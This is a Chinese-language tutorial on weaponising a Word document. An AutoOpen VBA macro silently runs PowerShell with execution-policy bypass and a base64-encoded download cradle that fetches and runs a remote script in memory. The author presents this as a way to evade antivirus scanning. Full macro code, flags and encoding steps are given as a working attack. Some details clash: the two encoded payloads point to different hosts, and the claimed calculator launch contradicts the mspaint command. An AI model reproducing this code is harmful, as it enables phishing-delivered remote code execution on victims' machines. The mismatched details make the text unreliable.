本文将介绍利用office宏功能植入VBS代码下载远程脚本，并利用powershell执行的过程。

1.首先需要搭建一个web服务器，用来提供shellceode等，也可以替换成远控客户端。（之所以做这个事情，我们会使用powershell去执行恶意代码，如果这个代码保存在本地，杀软等可以轻松通过静态扫描解决。而由于powershell的特性，可以将恶意代码直接加入内存中，该部分很难被杀软扫描到，故存有绕过的能力）

可以搭建服务器，例如使用windows：https://jingyan.baidu.com/article/adc8151344faadf723bf731f.html

我们可以将我们要下发的指令保存到.js文件：

cmd.js : powershell.exe Invoke-Item c:\windows\system32\mspaint.exe

保存在主页后：我们可以通过http://ip:port/cmd.js访问到

2.office 宏功能

对于不熟悉的同学可以参考：https://jingyan.baidu.com/article/59703552ab30b88fc0074009.html

另外为了让宏教隐蔽的在文件启动即运行，所以注册函数为AutoOpen:https://zhidao.baidu.com/question/1893934225453025260.html

详细VBS代码如下：
Sub AutoOpen()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell.exe -w hidden -Nop -Exec Bypass -Enc aQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMgA3AC4AMAAuADAALgAxAC8AYwBtAGQALgBqAHMAJwApAA=="
End Sub


注意，在VBS中，我们通过shell.run去运行我们的代码，这里我们是通过启动powershell去执行别的命令。由于powershell支持base64编码的内容代码的执行，因此有一定的免杀能力。

在上述代码中几个参数的含义分别是：可参考：http://baijiahao.baidu.com/s?id=1584574371164088458&wfr=spider&for=pc

-w hidden：隐藏执行窗口

-Nop：忽略配置（Profile）文件中的命令。

-Exec Bypass：绕过启动策略

–Enc：执行编码过的代码

所以实际真实的完整payload是：
powershell.exe -w hidden -Nop -Exec Bypass -Enc iex(New-Object Net.WebClient).DownloadString(‘http://127.0.0.1/cmd.js’)
在实际中操作发现，powershell支持的base64编码比较特殊，不能直接对：
iex(New-Object Net.WebClient).DownloadString(‘http://127.0.0.1/cmd.js’)这个部分进行编码转化，需要在每个字符中间增加\x00 如下后在进行base64编码：

iex(New-Object Net.WebClient).DownloadString(‘http://127.0.0.1/cmd.js’)   （每个字符后面都有个\x00

编码转换后得到：aQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANwAuADEAMAAwAC4AMQAyADEALgAwAC8AYwBtAGQALgBqAHMAJwApAA==

我们将VBS保存后到word后，再次点击该文件启动，就会看到执行并启动了计算器。

其中有一点需要注意：实际上整个调用链路是用户点击了调用office文件，其中的宏自动执行，执行的代码是去访问一个host并获取攻击shellcode，由于powershell的特性，可以把获取到的代码直接加载到内存中执行，很难被发现。